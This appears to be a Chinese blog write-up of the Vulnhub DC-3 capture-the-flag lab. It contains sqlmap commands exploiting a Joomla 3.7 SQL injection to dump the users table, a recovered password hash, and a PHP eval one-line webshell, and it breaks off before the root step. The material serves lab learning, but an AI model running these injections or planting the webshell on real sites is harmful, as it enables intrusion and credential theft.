首先明确:《中华人民共和国网络安全法 》

开始

192.168.37.132

This time, there is only one flag, one entry point and no clues.

To get the flag, you'll obviously have to gain root privileges.

How you get to be root is up to you - and, obviously, the system.

Good luck - and I hope you enjoy this little challenge.  :-)

目标 root 权限

同时

dirb http://192.168.37.132 -X .txt

版本 3.7

searchsploit joomla

/usr/share/exploitdb/exploits/php/webapps/42033.txt

复制一份到桌面打开,直接访问可能会出现卡顿

--passwords         Enumerate DBMS users password hashes
    --tables            Enumerate DBMS database tables
    --columns           Enumerate DBMS database table columns
    --schema            Enumerate DBMS schema
    --dump              Dump DBMS database table entries
    --dump-all          Dump all DBMS databases tables entries
    -D DB               DBMS database to enumerate
    -T TBL              DBMS database table(s) to enumerate
    -C COL              DBMS database table column(s) to enumerate

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

192.168.37.132

sqlmap -u "http://192.168.37.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

joomladb库

sqlmap -u "http://192.168.37.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]

爆表

sqlmap -u "http://192.168.37.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]

sqlmap -u "http://192.168.37.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "name,password" --dump -p list[fullordering]

$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

192.168.37.132

登录这个页面发现没有什么东西,只能更改编辑这个页面,也就是说应该还有其他地方要用到 admin 的账号,接下来扫目录

扫到

果然是个新的登录窗口

进入后台

目标明确,想要 root 权限,先控制,可以写一句话木马

ASP

<?php
@eval($_REQUEST['Pai'])
?>

Vulnhub DC-3相关推荐

  1. vulnhub DC系列 DC-8

    总结:exim4提权 目录 下载地址 漏洞分析 信息收集 网站爆破 后台webshell 提权 下载地址 DC-8.zip (Size: 379 MB) Download: http://www.fi ...

  2. vulnhub DC系列 DC-6

    总结:wpscan爆破,nmap提权 目录 下载地址 漏洞分析 信息收集 用户和密码爆破 命令执行 方法一: 方法二: 提权 下载地址 DC-6.zip (Size: 619 MB) Download ...

  3. vulnhub DC系列 DC-2

    总结:cewl和wpscan的使用,rbash逃逸,suid提权 下载地址 DC-2.zip (Size: 847 MB) Download: http://www.five86.com/downlo ...

  4. vulnhub DC系列 DC-4

    总结:爆破,teehee提权 目录 下载地址 漏洞分析 信息收集 密码爆破 命令执行 ​编辑 ssh爆破 提权 下载地址 DC-4.zip (Size: 617 MB) Download: http: ...

  5. vulnhub DC系列 DC-9

    总结:sql注入,端口敲门,覆盖passwd提权 下载地址 DC-9.zip (Size: 700 MB) Download: http://www.five86.com/downloads/DC-9 ...

  6. vulnhub DC系列 DC-3

    总结:joomscan工具的使用,cve-2016-4557内核提权或者cve-2021-4034内核提权 下载地址 漏洞分析 信息收集 sql注入 写马 提权 反弹shell 内核提权 cve-20 ...

  7. Vulnhub靶机DC系列-DC-8

    Vulnhub靶机DC系列-DC-8 靶场名称:DC-8 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ 下载地址: DC-8.zip (Size: 379 ...

  8. 【vulnhub】靶机- [DC系列]DC9(附靶机))

    主机信息 Kali:192.168.56.113 DC9:192.168.56.112 实验过程 先进行主机探测,查找靶机的IP地址: arp-scan --interface eth1 192.16 ...

  9. 『VulnHub系列』DC: 9-Walkthrough

    靶机地址 难度:中等 靶机发布日期:2019年12月29日 靶机描述:DC-9 is another purposely built vulnerable lab with the intent of ...

  10. vulnhub渗透系列之DC(一) :内含suid的三种提权方法

    我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习. 实验过程总结 1.这个题我觉得对刚入门的我来说,十分的困难 ...

最新文章

  1. linux的bh文件停止运行,linux 系统 rcu_bh self-detected stall 问题处理
  2. python 向量_关于Python中的向量相加和numpy中的向量相加效率对比
  3. 中兴c600olt数据配置_中兴天机Axon 10 Pro再掀波澜,4G版3199元起,5G版还有悬念?...
  4. Python程序编译与反编译
  5. LCD液晶显示的51单片机简单计算器
  6. Java神鬼莫测之MyBatis实现分页全过程(三)
  7. ie调试html代码,IE下的调试工具IE WebDeveloper
  8. Louvain 算法的核心思路以及数据结构(最完善版)
  9. --随笔--带你轻松理解TCP中的三次握手
  10. c语言abs作用是什么意思,c语言fabs()是什么意思?和abs()有什么区别
  11. 3dmax2014 uv用法_3dmax2014UVW是什么意思,怎么展开UVWID:30075914
  12. c语言 char = china,[求助]char a []=CHINA
  13. 【批量解压d文件】d文件是GNSS观测数据文件
  14. solidworks正版多少钱_SOLIDWORKS 2020、2021正版软件价格是多少钱?SW官方报价_专业版和白金版...
  15. 北大计算机科学与技术保研率,北京师范大学2019届保研率34.7%,北大、人大、清华外校深造前三...
  16. 百度推广降低成本获得更多优质流量!
  17. STM32读取编码器数据(STM32-1)
  18. 关于Android模拟器键盘不能使用的解决方法
  19. java的throw不常用吗_java中的throw与throws的区别
  20. 国际标准普尔家庭资产象限图

热门文章

  1. 二维正态分布的最大似然估计_最大似然估计-高斯分布
  2. python调用msfconsole全自动永恒之蓝攻击_使用Metasploit复现永恒之蓝攻击
  3. 001 物理机、虚拟机、有线网卡、无线网卡组局域网
  4. python+vue塔尔寺景点门票销售管理系统
  5. LaTex练习日记03 — 文章的篇章格式
  6. 项目实训- 基于unity的2D多人乱斗闯关游戏设计与开发(九——pun)
  7. iOS学习笔记(5)— UITextField
  8. 计算机软件模型改进,基于改进Kano模型的服务优化研究_樊根耀.docx 计算机软件及应用...
  9. 对不起!这篇SVPWM来晚了!
  10. JS实现搜索匹配功能